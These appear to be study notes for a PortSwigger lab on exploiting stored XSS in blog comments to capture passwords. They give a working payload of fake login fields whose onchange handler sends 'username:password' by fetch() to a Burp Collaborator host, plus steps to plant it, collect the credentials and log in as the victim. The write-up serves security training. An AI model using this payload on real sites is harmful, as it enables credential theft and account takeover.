Below are precise notes demonstrating how to practically exploit a **stored Cross-Site Scripting (XSS)** vulnerability in blog comments to silently [steal usernames and passwords](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords) using **Burp Suite Collaborator**. --- ##### **Why the Vulnerability Exists (Analysis of Vulnerable Element)** The vulnerability exists due to the blog comment functionality directly embedding user input into the HTML DOM without sufficient sanitization or encoding. Specifically, the vulnerable element: ```html <section class="comment"> <p><!-- attacker-controlled content --></p> </section> ``` Because the application fails to sanitize HTML/JavaScript, attackers can insert arbitrary elements like: ```html <input>, <script>, <img>, <iframe> ``` As a result, any JavaScript event handlers (e.g., `onchange`) become executable in the victim's browser. --- ##### **Step-by-step Credential Theft Exploitation** **1. Prepare Burp Collaborator:** - Open **Burp Suite Professional**. - Navigate to the **Collaborator** tab. - Click **"Copy to clipboard"** to copy your unique subdomain (e.g., `your-subdomain.burpcollaborator.net`). --- **2. Craft Payload to Capture Credentials:** Use this HTML/JavaScript payload to capture victim's username and password silently: ```html <input name=username id=username> <input type=password name=password onchange="if(this.value.length)fetch('https://your-subdomain.burpcollaborator.net',{ method:'POST', mode: 'no-cors', body: username.value + ':' + this.value });"> ``` **Payload Explanation:** - Two input fields (`username` and `password`) appear legitimate. - When the victim enters a password (`onchange` event triggers), the script uses JavaScript's Fetch API to POST the credentials to Burp Collaborator silently (`no-cors` hides the interaction from the user). --- **3. Deploy the Payload:** - Submit this crafted payload in the comment form as your comment. - Wait until the victim (simulated user) views this comment page. --- **4. Harvesting Credentials:** - In **Burp Collaborator**, click **"Poll now"** to retrieve interactions. - You'll see the captured username and password in the POST request body: ``` victim_username:victim_password ``` ![[CleanShot 2025-04-12 at 12.53.08.png]] --- **5. Authenticate as Victim:** - Use the captured credentials on the login form of the target website: ``` Username: victim_username Password: victim_password ``` - Access victim’s account successfully, verifying exploit completion.